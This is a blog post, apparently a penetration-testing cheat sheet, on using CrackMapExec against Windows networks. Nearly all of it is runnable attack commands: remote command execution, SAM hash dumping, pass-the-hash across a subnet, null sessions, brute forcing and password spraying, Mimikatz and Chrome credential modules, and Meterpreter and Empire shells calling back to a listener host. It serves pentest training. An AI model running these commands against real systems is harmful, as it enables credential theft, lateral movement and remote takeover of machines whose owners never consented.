Posted on by Glenn

[ Pen Testing Windows ] :: Penetration Testing Windows: CrackMapExec

Gather Your Tools

First off, be a smart hacker and know how to find great online materials, like this how-to:
https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html

And this excellent tute on CrackMapExec:
https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/

For the TL;DR of that page, start in Bash:

# get syntax and details
python crackmapexec.py

# network enumeration
python crackmapexec.py 192.168.1.0/24

Executing Commands

Note that if you run a command, you’ll need appropriate permissions. This will show up as (Pwn3d!) during execution.

CME has three execution modes

wmiexec executes commands via WMI

atexec executes commands by scheduling a task with windows task scheduler

smbexec executes commands by creating and running a service

Force CME to use only one execution method using the –exec-method flag.

Executing commands

Execute whoami on the target using the -x flag:

crackmapexec 192.168.1.11 -u Administrator -p 'password' -x whoami

Directly execute PowerShell commands with the -X flag:

crackmapexec 192.168.1.11 -u Administrator -p 'password' -X '$PSVersionTable'

Check for logged in users

crackmapexec 192.168.1.11 -u 'Administrator' -p 'password' --lusers

Credential Attacks

Dumping the local SAM hashes

crackmapexec 192.168.1.11 -u 'Administrator' -p 'password' --local-auth --sam

Authenticating via SMB using Pass-The-Hash attack uses the -H flag:

crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH

crackmapexec smb <target(s)> -u username -H NTHASH

Pass-the-Hash against a  subnet

Login to every host on the subnet using smb with admin + hash. Use –local-auth and a local admin password.

cme smb 192.168.1.0/24 -u administrator -H 'aabbb435cc1404eeaa35b51404ee:dd09de4ff0aeee8d9f4a61100e51

NULL Sessions

CME and even the net  command let you log in as nobody: a NULL Session.

crackmapexec smb <target(s)> -u '' -p ''
# or
net use \\192.168.1.11\ipc$ "" /user:""

(See this short article for more uses of NULL Sessions:
http://smallvoid.com/article/winnt-null-session.html.)

Brute Forcing & Password Spraying

Point crackmapexec at the subnet and pass the creds.

Using SMB
crackmapexec 192.168.1.0/24 -u Administrator -p password

However, check the account lockout policy first, so you know how slow you have to go:

crackmapexec 192.168.1.0/24 -u Administrator -p password --pass-pol

Look for the number of tries you’re allowed. If there’s no limit, crack away!

Specify a value, a file or multiple values and CME will brute-force logins for all targets using the specified protocol (wmi, at or smb):

crackmapexec smb 192.168.1.1-100 -u username1 -p password1 password2 
crackmapexec wmi 192.168.1.1> -u username1 username2 -p password1 
crackmapexec at 192.168.1.0/24 -u ~/usernames -p ~/passwords 
crackmapexec smb 192.168.1.1-25,30-35 -u ~/usernames -H ~/ntlm_hashes

Modules

Using a module

Run cme <protocol> <target(s)> -M <module name>.

Run the SMB Mimikatz module

(This is going to CRASH LSASS!)

cmesmb <target(s)> -u Administrator -p 'password' -M mimikatz

View module options

cme <protocol> -M <module name> --options # to view module options
# for example:
cme smb -M mimikatz --options

Using Module Options

Module options are specified with the -o flag. All options are specified as KEY=value.

Example:

cme <protocol> <target(s)> -u Administrator -p 'password' -M mimikatz -o COMMAND='privilege::debug'

Modules – MimiKatz

cme 192.168.1.11 -u 'Administrator' -p 'password' --local-auth -M mimikatz

(This is a dangerous module, as it will crash LSASS and break login.)

Modules – Enum_Chrome

sudo cme 192.168.1.11 -u 'Administrator' -p 'password' --local-auth -M enum_chrome

Getting Shells with CrackMapExec

Metasploit

Metasploit Module – Metinject

Show Metinject options:

cme -M metinject --show-options
[*] metinject module options:
SMB to Meterpreter shell
sudo cme 192.168.1.11 -u 'Administrator' -p 'password' --local-auth -M met_inject -o LHOST=192.168.1.10 LPORT=5656 
Password:

Empire

Start RESTful API:

 empire --rest --user empireadmin --pass password

Launch an Empire listener waiting for the target:

cme 192.168.1.11 -u Administrator -p password --local-auth -M empire_exec -o LISTENER=MyCME

Double-Teaming with Empire and DeathStar

Okay, so CrackMapExec can deploy Empire agents to compromised machines. Now you can use DeathStar’s automation features. Use the empire_exec module, specify a listener for the Empire agents to use, and they all get deployed and activated at once. Any credentials you find can be imported into the CMD credential database.

cme smb ~/targets.txt id 1 -M empire_exec -o LISTENER=DeathStar

Once again this is a TL;DR from this detailed document:
https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/
Check out his whole repository of great resources!